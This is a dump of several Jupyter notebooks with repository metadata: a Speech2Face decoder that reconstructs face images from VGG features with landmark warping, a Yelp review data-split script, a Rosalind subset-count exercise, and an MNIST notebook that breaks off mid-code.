https://files.pythonhosted.org/packages/91/af/5b305f86f2d218091af657ddb53f984ecbd9518ca9fe8ef4103a007252c9/torchfile-0.1.0.tar.gz\nBuilding wheels for collected packages: torchfile\n Building wheel for torchfile (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for torchfile: filename=torchfile-0.1.0-cp36-none-any.whl size=5712 sha256=61018a8cdc0fa54c1195cc1d4cca77c36ed8ade8b54df0cb482f08e370ff40f6\n Stored in directory: /root/.cache/pip/wheels/b1/c3/d6/9a1cc8f3a99a0fc1124cae20153f36af59a6e683daca0a0814\nSuccessfully built torchfile\nInstalling collected packages: torchfile\nSuccessfully installed torchfile-0.1.0\n" ] ], [ [ "# Dataloader\n", "_____no_output_____" ] ], [ [ "from os.path import join\nimport torch\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\nimport cv2\nfrom time import time\nimport face_recognition\nfrom random import randint\nfrom google.colab.patches import cv2_imshow\n\nclass Decoder_Dataset(Dataset):\n \n\n def __init__(self, Folder, VggL, sample, dev = \"cuda\"):\n\n self.root = Folder\n self.dev = dev \n self.names = os.listdir(self.root) \n self.sample = sample if sample < 20 else 20\n self.a_length = len(os.listdir(self.root)) \n self.length = self.a_length * self.sample\n self.img_name = self.root + \"{}.jpg\"\n self.vgg_features = VggL\n \n print(self.a_length)\n\n def image_out(self,path, mean =[0.485, 0.456, 0.406] , std = [0.229, 0.224, 0.225]):#[0.485, 0.456, 0.406]\n #img = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB)\n img = Image.open(path)\n count = 0\n resultant = []\n try:\n np_image = np.asarray(img.convert('RGB'))\n faceLocation = face_recognition.face_locations(np_image)[count]\n x,y1,x1,y = faceLocation\n np_image = np_image[x:x1,y:y1]\n landmark = face_recognition.face_landmarks(np_image)\n for i in list(landmark[0].keys()):\n resultant += landmark[0][i]\n landmark = np.ravel(np.array(resultant))\n img = img.resize((224,224))\n # img = cv2.resize(img, (224,224), interpolation = 
cv2.INTER_AREA)\n \n preprocess = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=mean, std=std),\n ])\n img = preprocess(img)\n \n \n \n # loader = transforms.Compose([ transforms.Normalize(mean, std) ])\n # img = loader(img)\n # p = np.reshape((img.numpy() * 255), (224, 224, 3))\n # cv2_imshow(p)\n \n \n except IndexError:\n return None, None\n \n \n return img.reshape(1,224,224,3), torch.tensor(landmark)\n\n\n\n def pseudo_idx(self,idx):\n if idx < self.a_length:\n return idx\n else:\n ## return self.pseudo_idx(idx - self.a_length) ## RECURSION\n return idx // self.sample \n\n def __len__(self):\n return self.length\n\n def __getitem__(self, idx):\n\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n while True:\n index = idx\n index = self.pseudo_idx(index)\n name = index \n path = self.img_name.format(name)\n # print(path)\n\n if not os.path.exists(path):\n idx = randint(0, self.a_length) # IF FILE PATH DOESNOT EXISTS\n continue\n\n image, landmark= self.image_out(path)\n if image is None:\n idx = randint(0, self.a_length) # IF FILE PATH DOESNOT EXISTS\n continue\n\n image = image.view(3,224,224).float()\n return image, landmark.float()", "_____no_output_____" ], [ "############### THIS CELL IS COPIED FROM DEEP SPEECH MOZILLA #########################\n\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport tensorflow.compat.v1 as tfv1\nfrom tensorflow.compat import dimension_value\nfrom tensorflow.contrib.image import dense_image_warp\nfrom tensorflow.contrib.image import interpolate_spline\n\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\n\ndef _to_float32(value):\n return tf.cast(value, tf.float32)\n\ndef _to_int32(value):\n return tf.cast(value, tf.int32)\n\ndef _get_grid_locations(image_height, image_width):\n \"\"\"Wrapper for np.meshgrid.\"\"\"\n tfv1.assert_type(image_height, tf.int32)\n 
tfv1.assert_type(image_width, tf.int32)\n\n y_range = tf.range(image_height)\n x_range = tf.range(image_width)\n y_grid, x_grid = tf.meshgrid(y_range, x_range, indexing='ij')\n return tf.stack((y_grid, x_grid), -1)\n\n\ndef _expand_to_minibatch(tensor, batch_size):\n \"\"\"Tile arbitrarily-sized np_array to include new batch dimension.\"\"\"\n ndim = tf.size(tf.shape(tensor))\n ones = tf.ones((ndim,), tf.int32)\n\n tiles = tf.concat(([batch_size], ones), 0)\n return tf.tile(tf.expand_dims(tensor, 0), tiles)\n\n\ndef _get_boundary_locations(image_height, image_width, num_points_per_edge):\n \"\"\"Compute evenly-spaced indices along edge of image.\"\"\"\n image_height_end = _to_float32(tf.math.subtract(image_height, 1))\n image_width_end = _to_float32(tf.math.subtract(image_width, 1))\n y_range = tf.linspace(0.0, image_height_end, num_points_per_edge + 2)\n x_range = tf.linspace(0.0, image_height_end, num_points_per_edge + 2)\n ys, xs = tf.meshgrid(y_range, x_range, indexing='ij')\n is_boundary = tf.logical_or(\n tf.logical_or(tf.equal(xs, 0.0), tf.equal(xs, image_width_end)),\n tf.logical_or(tf.equal(ys, 0.0), tf.equal(ys, image_height_end)))\n return tf.stack([tf.boolean_mask(ys, is_boundary), tf.boolean_mask(xs, is_boundary)], axis=-1)\n\n\ndef _add_zero_flow_controls_at_boundary(control_point_locations,\n control_point_flows, image_height,\n image_width, boundary_points_per_edge):\n \"\"\"Add control points for zero-flow boundary conditions.\n Augment the set of control points with extra points on the\n boundary of the image that have zero flow.\n Args:\n control_point_locations: input control points\n control_point_flows: their flows\n image_height: image height\n image_width: image width\n boundary_points_per_edge: number of points to add in the middle of each\n edge (not including the corners).\n The total number of points added is\n 4 + 4*(boundary_points_per_edge).\n Returns:\n merged_control_point_locations: augmented set of control point locations\n 
merged_control_point_flows: augmented set of control point flows\n \"\"\"\n\n batch_size = dimension_value(tf.shape(control_point_locations)[0])\n\n boundary_point_locations = _get_boundary_locations(image_height, image_width,\n boundary_points_per_edge)\n boundary_point_shape = tf.shape(boundary_point_locations)\n boundary_point_flows = tf.zeros([boundary_point_shape[0], 2])\n\n minbatch_locations = _expand_to_minibatch(boundary_point_locations, batch_size)\n type_to_use = control_point_locations.dtype\n boundary_point_locations = tf.cast(minbatch_locations, type_to_use)\n\n minbatch_flows = _expand_to_minibatch(boundary_point_flows, batch_size)\n\n boundary_point_flows = tf.cast(minbatch_flows, type_to_use)\n\n merged_control_point_locations = tf.concat(\n [control_point_locations, boundary_point_locations], 1)\n\n merged_control_point_flows = tf.concat(\n [control_point_flows, boundary_point_flows], 1)\n\n return merged_control_point_locations, merged_control_point_flows\n\n\ndef sparse_image_warp(image,\n source_control_point_locations,\n dest_control_point_locations,\n interpolation_order=2,\n regularization_weight=0.0,\n num_boundary_points=0,\n name='sparse_image_warp'):\n \"\"\"Image warping using correspondences between sparse control points.\n Apply a non-linear warp to the image, where the warp is specified by\n the source and destination locations of a (potentially small) number of\n control points. First, we use a polyharmonic spline\n (`tf.contrib.image.interpolate_spline`) to interpolate the displacements\n between the corresponding control points to a dense flow field.\n Then, we warp the image using this dense flow field\n (`tf.contrib.image.dense_image_warp`).\n Let t index our control points. 
For regularization_weight=0, we have:\n warped_image[b, dest_control_point_locations[b, t, 0],\n dest_control_point_locations[b, t, 1], :] =\n image[b, source_control_point_locations[b, t, 0],\n source_control_point_locations[b, t, 1], :].\n For regularization_weight > 0, this condition is met approximately, since\n regularized interpolation trades off smoothness of the interpolant vs.\n reconstruction of the interpolant at the control points.\n See `tf.contrib.image.interpolate_spline` for further documentation of the\n interpolation_order and regularization_weight arguments.\n Args:\n image: `[batch, height, width, channels]` float `Tensor`\n source_control_point_locations: `[batch, num_control_points, 2]` float\n `Tensor`\n dest_control_point_locations: `[batch, num_control_points, 2]` float\n `Tensor`\n interpolation_order: polynomial order used by the spline interpolation\n regularization_weight: weight on smoothness regularizer in interpolation\n num_boundary_points: How many zero-flow boundary points to include at\n each image edge.Usage:\n num_boundary_points=0: don't add zero-flow points\n num_boundary_points=1: 4 corners of the image\n num_boundary_points=2: 4 corners and one in the middle of each edge\n (8 points total)\n num_boundary_points=n: 4 corners and n-1 along each edge\n name: A name for the operation (optional).\n Note that image and offsets can be of type tf.half, tf.float32, or\n tf.float64, and do not necessarily have to be the same type.\n Returns:\n warped_image: `[batch, height, width, channels]` float `Tensor` with same\n type as input image.\n flow_field: `[batch, height, width, 2]` float `Tensor` containing the dense\n flow field produced by the interpolation.\n \"\"\"\n\n image = ops.convert_to_tensor(image)\n source_control_point_locations = ops.convert_to_tensor(\n source_control_point_locations)\n dest_control_point_locations = ops.convert_to_tensor(\n dest_control_point_locations)\n\n control_point_flows = (\n 
dest_control_point_locations - source_control_point_locations)\n\n clamp_boundaries = num_boundary_points > 0\n boundary_points_per_edge = num_boundary_points - 1\n\n with ops.name_scope(name):\n image_shape = tf.shape(image)\n batch_size, image_height, image_width = image_shape[0], image_shape[1], image_shape[2]\n\n # This generates the dense locations where the interpolant\n # will be evaluated.\n grid_locations = _get_grid_locations(image_height, image_width)\n\n flattened_grid_locations = tf.reshape(grid_locations,\n [tf.multiply(image_height, image_width), 2])\n\n # flattened_grid_locations = constant_op.constant(\n # _expand_to_minibatch(flattened_grid_locations, batch_size), image.dtype)\n flattened_grid_locations = _expand_to_minibatch(flattened_grid_locations, batch_size)\n flattened_grid_locations = tf.cast(flattened_grid_locations, dtype=image.dtype)\n\n if clamp_boundaries:\n (dest_control_point_locations,\n control_point_flows) = _add_zero_flow_controls_at_boundary(\n dest_control_point_locations, control_point_flows, image_height,\n image_width, boundary_points_per_edge)\n\n flattened_flows = interpolate_spline(\n dest_control_point_locations, control_point_flows,\n flattened_grid_locations, interpolation_order, regularization_weight)\n\n dense_flows = array_ops.reshape(flattened_flows,\n [batch_size, image_height, image_width, 2])\n\n warped_image = dense_image_warp(image, dense_flows)\n\n return warped_image, dense_flows", "_____no_output_____" ], [ "def image_warping(src_img, src_landmarks, dest_landmarks):\n # expanded_src_landmarks = np.expand_dims(np.float32(src_landmarks), axis=0)\n # expanded_dest_landmarks = np.expand_dims(np.float32(dest_landmarks), axis=0)\n # expanded_src_img = np.expand_dims(np.float32(src_img) / 255, axis=0)\n\n warped_img, dense_flows = sparse_image_warp(src_img,\n src_landmarks,\n dest_landmarks,\n interpolation_order=1,\n regularization_weight=0.1,\n num_boundary_points=2,\n name='sparse_image_warp')\n\n with 
tf.Session() as sess:\n out_img = sess.run(warped_img)\n warp_img = np.uint8(out_img[:, :, :, :] * 255)\n \n return warp_img\n \ndef face_landmark(img):\n X = np.zeros((img.shape[0], 72 ,2))\n flag = []\n for i in range(img.shape[0]):\n\n landmark = face_recognition.face_landmarks(img[i].reshape(224,224,3))\n resultant = []\n try:\n for j in list(landmark[0].keys()):\n resultant += landmark[0][j] \n except IndexError:\n flag.append(i)\n continue\n X[i] = np.array(resultant)\n return X, flag", "_____no_output_____" ], [ "import torch \nfrom torch import nn\n\nclass DECODER(nn.Module):\n def __init__(self, phase):\n super(DECODER, self).__init__()\n self.phase = phase\n self.fc3 = nn.Linear(4096, 1000)\n self.ReLU = nn.ReLU()\n #self.fc_bn3 = nn.BatchNorm1d(1000)\n\n\n self.fc4 = nn.Linear(1000, 14 * 14 * 256)\n self.fc_bn4 = nn.BatchNorm1d(14 * 14 * 256)\n def TransConv( i, kernal = 5, stride = 2, inp = None):\n if not inp:\n inp = max(256//2**(i-1), 32)\n\n layer = nn.Sequential(\n nn.ConvTranspose2d(inp, max(256//2**i, 32), \n kernal, stride=stride, padding=2, output_padding=1, \n dilation=1, padding_mode='zeros'),\n nn.ReLU(),\n nn.BatchNorm2d(max(256//2**i, 32)))\n return layer\n self.T1_ = TransConv(1, inp = 256)\n self.T2_ = TransConv(2)\n self.T3_ = TransConv(3)\n self.T4_ = TransConv(4)\n \n self.ConvLast = nn.Sequential(\n nn.Conv2d(32, 3, (1,1), stride=1),\n nn.BatchNorm2d(3),\n nn.ReLU())\n\n\n self.layerLandmark1 = nn.Linear(1000, 800)\n self.layerLandmark2 = nn.Linear(800, 600)\n self.layerLandmark3 = nn.Linear(600, 400)\n self.layerLandmark4 = nn.Linear(400, 200)\n self.layerLandmark5 = nn.Linear(200, 144)\n\n\n\n\n\n \n\n\n def forward(self, x):\n L1 = self.fc3(x)\n L1 = self.ReLU(L1)\n\n\n L2 = self.layerLandmark1(L1)\n L2 = self.ReLU(L2)\n\n L3 = self.layerLandmark2(L2)\n L3 = self.ReLU(L3)\n\n L4 = self.layerLandmark3(L3)\n L4 = self.ReLU(L4)\n\n L5 = self.layerLandmark4(L4)\n L5 = self.ReLU(L5)\n\n L6 = self.layerLandmark5(L5)\n outL = 
self.ReLU(L6)\n\n\n # B1 = self.fc_bn3(L1) \n T0 = self.fc4(L1) \n T0 = self.ReLU(T0)\n # T0 = self.fc_bn4(T0)\n T0 = T0.view(-1,256,14,14)\n\n\n\n T1 = self.T1_(T0)\n T2 = self.T2_(T1)\n T3 = self.T3_(T2)\n T4 = self.T4_(T3)\n\n outT = self.ConvLast(T4)\n if self.phase == \"train\":\n return outL, outT \n elif self.phase == \"eval\":\n img = outT.cpu().detach().numpy().reshape(-1, 224, 224, 3)*255\n outL = outL.cpu().detach().numpy()\n outL = np.dstack((outL[:,0::2],outL[:,1::2]))\n #print(\"land np img np \", outL_.shape, img_.shape)\n img = (img.reshape(-1,224,224,3)*255).astype(np.uint8)\n #print(\"img_t \",img_t.shape, img_t[0])\n src, flag = face_landmark(img)\n if flag:\n for r in flag:\n src[r] = outL[r]\n\n return image_warping(img.astype(np.float32), src.astype(np.float32), outL.astype(np.float32))\n\n \n # outN = outT.numpy()\n # outLN = outL.numpy()\n # src, flag = face_landmark(outN)\n # if flag:\n # for r in flag:\n # src[r] = outLN[r]\n \n # IMG = torch.from_numpy(image_warping(outN, src, outLN))\n \n # if self.phase == \"train\":\n # return outL, outT , VGGL(IMG)\n # if self.phase == \"test\":\n # return IMG", "_____no_output_____" ], [ "\nfrom torchsummary import summary\ndevice = \"cuda\" #torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel = DECODER(\"train\")\nmodel = model.cuda()\nsummary(model, input_size=(4096,))", "----------------------------------------------------------------\n Layer (type) Output Shape Param #\n================================================================\n Linear-1 [-1, 1000] 4,097,000\n ReLU-2 [-1, 1000] 0\n Linear-3 [-1, 800] 800,800\n ReLU-4 [-1, 800] 0\n Linear-5 [-1, 600] 480,600\n ReLU-6 [-1, 600] 0\n Linear-7 [-1, 400] 240,400\n ReLU-8 [-1, 400] 0\n Linear-9 [-1, 200] 80,200\n ReLU-10 [-1, 200] 0\n Linear-11 [-1, 144] 28,944\n ReLU-12 [-1, 144] 0\n Linear-13 [-1, 50176] 50,226,176\n ReLU-14 [-1, 50176] 0\n ConvTranspose2d-15 [-1, 128, 28, 28] 819,328\n ReLU-16 [-1, 128, 28, 28] 0\n 
BatchNorm2d-17 [-1, 128, 28, 28] 256\n ConvTranspose2d-18 [-1, 64, 56, 56] 204,864\n ReLU-19 [-1, 64, 56, 56] 0\n BatchNorm2d-20 [-1, 64, 56, 56] 128\n ConvTranspose2d-21 [-1, 32, 112, 112] 51,232\n ReLU-22 [-1, 32, 112, 112] 0\n BatchNorm2d-23 [-1, 32, 112, 112] 64\n ConvTranspose2d-24 [-1, 32, 224, 224] 25,632\n ReLU-25 [-1, 32, 224, 224] 0\n BatchNorm2d-26 [-1, 32, 224, 224] 64\n Conv2d-27 [-1, 3, 224, 224] 99\n BatchNorm2d-28 [-1, 3, 224, 224] 6\n ReLU-29 [-1, 3, 224, 224] 0\n================================================================\nTotal params: 57,055,793\nTrainable params: 57,055,793\nNon-trainable params: 0\n----------------------------------------------------------------\nInput size (MB): 0.02\nForward/backward pass size (MB): 57.09\nParams size (MB): 217.65\nEstimated Total Size (MB): 274.75\n----------------------------------------------------------------\n" ] ], [ [ "# Training", "_____no_output_____" ] ], [ [ "import os\noptimizer = torch.optim.Adam(model.parameters(), lr=0.009)\ncriterion_1 = nn.MSELoss()\ncriterion_2 = nn.L1Loss()\ncriterion_3 = nn.CosineEmbeddingLoss()\nalpha = 0.0002\nbeta = 1.0\ngamma = 1.5\nl = 10\nBATCH = 10\nWORKER = 0\nSAMPLE = 20\nnum_epochs = 5\nsim = torch.ones((BATCH,1, 128 ))\ntrain_dataset = Decoder_Dataset(\"/content/drive/My Drive/Speech2Face/data_test/faces/\", sample = SAMPLE, VggL = \"vgg16\")\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, \n\t\t batch_size=BATCH, \n\t\t num_workers =WORKER,\n\t\t shuffle=False)", "3630\n" ], [ "#! 
mkdir checkpoint", "_____no_output_____" ], [ "import nvidia_smi\nimport psutil\nimport platform\n\nnvidia_smi.nvmlInit()\nhandle = nvidia_smi.nvmlDeviceGetHandleByIndex(0)", "_____no_output_____" ], [ "from datetime import datetime\n\nimport torch\nimport torchvision.models.vgg as models\n\nvgg16 = models.vgg16(pretrained=True)\nvgg16.classifier = vgg16.classifier[:-1]\nvgg = vgg16\nvgg.cuda()\n\nfor epoch in range(num_epochs):\n print(\"Epoch\", epoch)\n running_loss = 0.0\n running_loss_1 = 0.0\n running_loss_2 = 0.0\n start_time = time()\n for i,(img, landm) in enumerate(train_loader):\n \n # Move tensors to the configured device\n img = img.to(device)\n landm = landm.to(device)\n #print(\"input\",img.size(), landm.size())\n\n feature = vgg(img.reshape((-1,3, 224,224)))\n print(feature.shape)\n #print(\"vgg\",feature.size())\n # Forward pass\n outL, outT = model(feature)\n #print(\"output \", outL.size(), outT.size())\n \n outL = outL.squeeze(1)\n\n loss_1 = criterion_1(outL, landm)\n loss_2 = criterion_2(outT, img)\n running_loss_1 += loss_1.item()\n running_loss_2 += loss_2.item()\n\n # img_ = outT.cpu().detach().numpy()\n # outL_ = outL.cpu().detach().numpy()\n # outL_ = np.dstack((outL_[:,0::2],outL_[:,1::2]))\n # #print(\"land np img np \", outL_.shape, img_.shape)\n # img_t = (img_.reshape(-1,224,224,3)*255).astype(np.uint8)\n # #print(\"img_t \",img_t.shape, img_t[0])\n # if epoch in [0, 1]:\n # src, flag = face_landmark(img_t)\n # if flag:\n # for f in flag:\n # src[f] = outL_[f]\n # else:\n # outL_ = landm.cpu().detach().numpy()\n # img_ = image_warping(img_.astype(np.float32), src.astype(np.float32), outL_.astype(np.float32))\n # \n # # print(img_.size(), type(img_))\n # # print(feature.size())\n # img_ = img_.reshape(((-1, 224, 224, 3))) * 255.0\n # \n # feature_out = face_recognition.face_encodings((img_ ).astype(np.uint8))[0]\n # # print(feature_out.size(), sim.size())\n # loss_3 = criterion_3(feature_out.view(BATCH,1,128).to(device), 
feature.view(BATCH,1,128), sim.view(BATCH,1,128).to(device))\n # running_loss_3 += loss_3.item()\n\n\n loss = (alpha*loss_1 + beta*loss_2 )*100\n # Backward and optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n\n if i % l == 0:\n # writer.add_scalar('training loss',running_loss/ data[\"show\"],epoch * len(train_loader) + i)\n res = nvidia_smi.nvmlDeviceGetUtilizationRates(handle)\n print('{} : Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}, gpu: {}%, gpu-mem: {}%, RAM: {}% , RAM Mem {}%, running_loss: {:.4f}, MSEloss {:.4f}, MAEloss {:.4f}, time: {:.4f}, '.format(datetime.now() ,epoch+1, num_epochs, i,int((train_dataset.__len__()/BATCH)), loss.item(),res.gpu, res.memory,psutil.cpu_percent(),psutil.virtual_memory()[2],running_loss/(BATCH*l),running_loss_1/(BATCH*l), running_loss_2/(BATCH*l), (time()- start_time)))\n #print(f'gpu: {res.gpu}%, gpu-mem: {res.memory}%, RAM: {psutil.cpu_percent()}% , RAM Mem {psutil.virtual_memory()[2]}%')\n running_loss = 0.0\n start_time = time()\n running_loss_1 = 0.0\n running_loss_2 = 0.0\n running_loss_3 = 0.0\n \n inv_normalize = transforms.Normalize(\n mean=[-0.485/0.229, -0.456/0.224, -0.406/0.225],\n std=[1/0.229, 1/0.224, 1/0.255]\n )\n\n img1 = outT.cpu().detach().numpy().reshape(-1, 224, 224, 3) * 255\n # Va inserito la riconversione\n\n cv2_imshow(img1[0].astype(np.uint8))\n\n\n \n\n \n\n outL = outL.cpu().detach().numpy()\n outL = np.dstack((outL[:,0::2],outL[:,1::2]))\n #print(\"land np img np \", outL_.shape, img_.shape)\n img1 = (img1.reshape(-1,224,224,3)).astype(np.uint8)\n #print(\"img_t \",img_t.shape, img_t[0])\n src, flag = face_landmark(img1)\n if flag:\n for r in flag:\n src[r] = outL[r]\n\n result = image_warping(img1.astype(np.float32), src.astype(np.float32), outL.astype(np.float32))\n\n img = (img.cpu().detach().numpy().reshape(-1,224,224,3))\n img_t = torch.tensor(img[0])\n print(img_t.shape)\n img = inv_normalize(img_t.reshape((3,224,224))) * 254.0\n 
cv2_imshow(img.reshape(224,224,3).numpy().astype(np.uint8))\n cv2_imshow(result[0])\n \n torch.save({'epoch': epoch,'model_state_dict': model.state_dict(),'optimizer_state_dict': optimizer.state_dict(), 'loss': loss}, \"/content/drive/My Drive/Speech2Face/check_poit_decoder/epoch_{}.pth\".format(epoch + 1))", "Epoch 0\ntorch.Size([10, 4096])\n2020-08-17 10:20:32.410867 : Epoch [1/5], Step [0/7260], Loss: 228.6088, gpu: 88%, gpu-mem: 40%, RAM: 7.0% , RAM Mem 26.5%, running_loss: 2.2861, MSEloss 53.3279, MAEloss 0.0122, time: 0.9088, \n" ], [ "model = DECODER('eval')\nstate = torch.load('/content/drive/My Drive/Speech2Face/check_poit_decoder/epoch_15.pth')\nmodel.load_state_dict(state['model_state_dict'])\n", "_____no_output_____" ], [ "path = \"/content/drive/My Drive/Speech2Face/data_test/test/n000078/0002_02.jpg\"\nimg = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB)\nfaceLoc = face_recognition.face_locations(img)\n\nx,y1,x1,y = faceLoc[0]\nimg = img[x:x1,y:y1]\nImage.fromarray(img)", "_____no_output_____" ], [ "img = cv2.resize(img, (224,224), interpolation = cv2.INTER_AREA)\nbiden_encoding = face_recognition.face_encodings(img)[0]\nencoded = torch.reshape(torch.from_numpy(biden_encoding).float(), (-1, 128))\n\noutT = model(encoded) \nout = torch.tensor(outT)\nout = np.squeeze(out)\nout = out.reshape(224,224,3)\n\nImage.fromarray(out.numpy())", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ] ]
e73007589aa55209211b1eed9ffa4122687ef402
11,522
ipynb
Jupyter Notebook
preprocess/split622data.ipynb
yang-233/mmsa
eed7b943746041b735d8a7af8d60b6457f0284f6
[ "MIT" ]
1
2021-04-20T07:03:50.000Z
2021-04-20T07:03:50.000Z
preprocess/split622data.ipynb
yang-233/mmsa
eed7b943746041b735d8a7af8d60b6457f0284f6
[ "MIT" ]
null
null
null
preprocess/split622data.ipynb
yang-233/mmsa
eed7b943746041b735d8a7af8d60b6457f0284f6
[ "MIT" ]
null
null
null
31.224932
1,228
0.536452
[ [ [ "import json\nimport os\nimport pickle\nfrom tqdm import tqdm\nfrom typing import *\nimport random\nimport numpy as np\nimport shutil\nfrom multiprocessing import Pool\nseed = 1945 # 种子值\nnp.random.seed(seed)\nrandom.seed(seed)", "_____no_output_____" ], [ "cities = ['Boston', 'Chicago', 'Los Angeles', 'New York', 'San Francisco']\nbase_dir = os.path.join(\"data\",\"yelp-vistanet\")\nraw_dir = os.path.join(base_dir, \"raw\")\nraw_train_file = os.path.join(raw_dir, \"train.json\")\nraw_valid_file = os.path.join(raw_dir, \"valid.json\")\nraw_test_files = [os.path.join(raw_dir, \"test\", f\"{city}_test.json\") for city in cities]\nbase_dir, raw_dir, raw_train_file, raw_valid_file, raw_test_files", "_____no_output_____" ], [ "photos_dir = os.path.join(base_dir, \"photos\")\nphotos_dir", "_____no_output_____" ], [ "def check_photo(_id:str):\n path = os.path.join(photos_dir, _id[:2], _id + \".jpg\")\n return os.path.exists(path)", "_____no_output_____" ], [ "def read_reviews(file_path:str, clean_data:bool) -> List[Dict[str, str]]: \n # 读入数据\n reviews = None\n if file_path.endswith(\".json\"):\n with open(file_path, 'r', encoding=\"utf-8\") as f:\n reviews = []\n for line in tqdm(f, \"Read json\"):\n review = json.loads(line)\n imgs = []\n captions = []\n for photo in review['Photos']:\n _id = photo['_id']\n caption = photo[\"Caption\"]\n if clean_data:\n if check_photo(_id):\n imgs.append(_id)\n captions.append(caption)\n else:\n imgs.append(_id)\n captions.append(caption)\n reviews.append({'_id': review['_id'],\n 'Text': review['Text'],\n 'Photos': imgs,\n 'Captions': captions,\n 'Rating': review['Rating']})\n elif file_pathle.endswith(\".pickle\"):\n with open(file_path, 'rb') as f:\n reviews = pickle.load(f) # 直接从pickle中加载\n else:\n raise RuntimeError(\"Illegal file path!\")\n return reviews", "_____no_output_____" ], [ "pathes = [raw_train_file, raw_valid_file, *raw_test_files]\npathes", "_____no_output_____" ], [ "total = []\nfor path in pathes:\n total += 
read_reviews(path, True)\nlen(total)", "Read json: 35435it [00:09, 3791.53it/s] \nRead json: 2215it [00:00, 15372.57it/s]\nRead json: 315it [00:00, 8599.75it/s]\nRead json: 325it [00:00, 10662.26it/s]\nRead json: 3730it [00:00, 19220.10it/s]\nRead json: 1715it [00:00, 17650.33it/s]\nRead json: 570it [00:00, 14839.91it/s]\n" ], [ "total[0]", "_____no_output_____" ], [ "random.shuffle(total)\ntotal[0]", "_____no_output_____" ], [ "dividing_point = len(total) // 5\nclear_data = {}\nclear_data[\"train\"] = total[:-2*dividing_point]\nclear_data[\"valid\"] = total[-2*dividing_point:-dividing_point]\nclear_data[\"test\"] = total[-dividing_point:]\nlen(clear_data[\"train\"]), len(clear_data[\"valid\"]), len(clear_data[\"test\"])", "_____no_output_____" ], [ "_622_base_dir = os.path.join(base_dir, \"622data\")\nclear_data_file = os.path.join(_622_base_dir, \"clear_data.pickle\")\nclear_data_file", "_____no_output_____" ], [ "with open(clear_data_file, \"wb\") as o:\n pickle.dump(clear_data, o, protocol=pickle.HIGHEST_PROTOCOL)", "_____no_output_____" ], [ "def get_imgs(reviews):\n res = []\n for r in reviews:\n res += r[\"Photos\"]\n return res", "_____no_output_____" ], [ "all_imgs_id = get_imgs(clear_data[\"train\"]) + get_imgs(clear_data[\"valid\"]) + get_imgs(clear_data[\"test\"])\nlen(all_imgs_id)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e73016ef1af3e194594c98d3dda8f81ea41b9bf9
1,386
ipynb
Jupyter Notebook
SSET.ipynb
anilk991/rosalindsolutions
1548b57fa6fbf04ec9968bc8ab47668d37c765d7
[ "MIT" ]
null
null
null
SSET.ipynb
anilk991/rosalindsolutions
1548b57fa6fbf04ec9968bc8ab47668d37c765d7
[ "MIT" ]
null
null
null
SSET.ipynb
anilk991/rosalindsolutions
1548b57fa6fbf04ec9968bc8ab47668d37c765d7
[ "MIT" ]
null
null
null
15.931034
34
0.455267
[ [ [ "def nSubsets(n):\n '''\n '''\n return (2**n)%1000000", "_____no_output_____" ], [ "print(nSubsets(3))", "8\n" ], [ "n = 835\nprint(nSubsets(835))", "362368\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code" ] ]
e7301a6c8570d1e06559de49c91454ead9360f44
322,208
ipynb
Jupyter Notebook
fdm/fdm_code/failure_in_4_9.ipynb
yurilavinas/failure_diversity_maximisation
24d5b90455eb554bc91b6092df53d83f4b1023df
[ "Apache-2.0" ]
null
null
null
fdm/fdm_code/failure_in_4_9.ipynb
yurilavinas/failure_diversity_maximisation
24d5b90455eb554bc91b6092df53d83f4b1023df
[ "Apache-2.0" ]
null
null
null
fdm/fdm_code/failure_in_4_9.ipynb
yurilavinas/failure_diversity_maximisation
24d5b90455eb554bc91b6092df53d83f4b1023df
[ "Apache-2.0" ]
null
null
null
105.711286
102,656
0.760537
[ [ [ "import torch\nimport torch.nn as nn\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms \nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torchvision\n\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.manifold import TSNE\nfrom sklearn.decomposition import PCA\nimport seaborn as sns\n\nimport random\nfrom torch.utils.data import Dataset\nimport os\nimport copy", "_____no_output_____" ], [ "input_size = 784\nhidden_size = 500 \nnum_classes = 10 \nnum_epochs = 60\nbatch_size = 100\nlearning_rate = 1e-3", "_____no_output_____" ], [ "def acc(n, train):\n\n correct = 0\n total = 0\n\n for images, labels in train:\n images = Variable(images.view(-1, 28*28))\n outputs = n(images)\n _, predicted = torch.max(outputs.data, 1) \n total += labels.size(0) \n correct += (predicted == labels).sum() \n\n print('Accuracy of the network train images: %d %%' % (100 * correct / total))\n", "_____no_output_____" ], [ "train_dataset = dsets.MNIST(root='./data',\n train=True,\n transform=transforms.ToTensor(),\n download=False)\n\ntest_dataset = dsets.MNIST(root='./data',\n train=False,\n transform=transforms.ToTensor(),\n download=False)", "_____no_output_____" ], [ "train = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n num_workers = 1,\n shuffle=True)\n\ntest = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=batch_size,\n num_workers = 1,\n shuffle=True)", "_____no_output_____" ] ], [ [ "Getting only data of 4s and 9s", "_____no_output_____" ] ], [ [ "new_labels_4 = []\nnew_images_4 = []\n\nnew_labels_9 = []\nnew_images_9 = []\n\nfor images, labels in train:\n images = Variable(images.view(-1, 28*28))\n for i,label in enumerate(labels):\n if 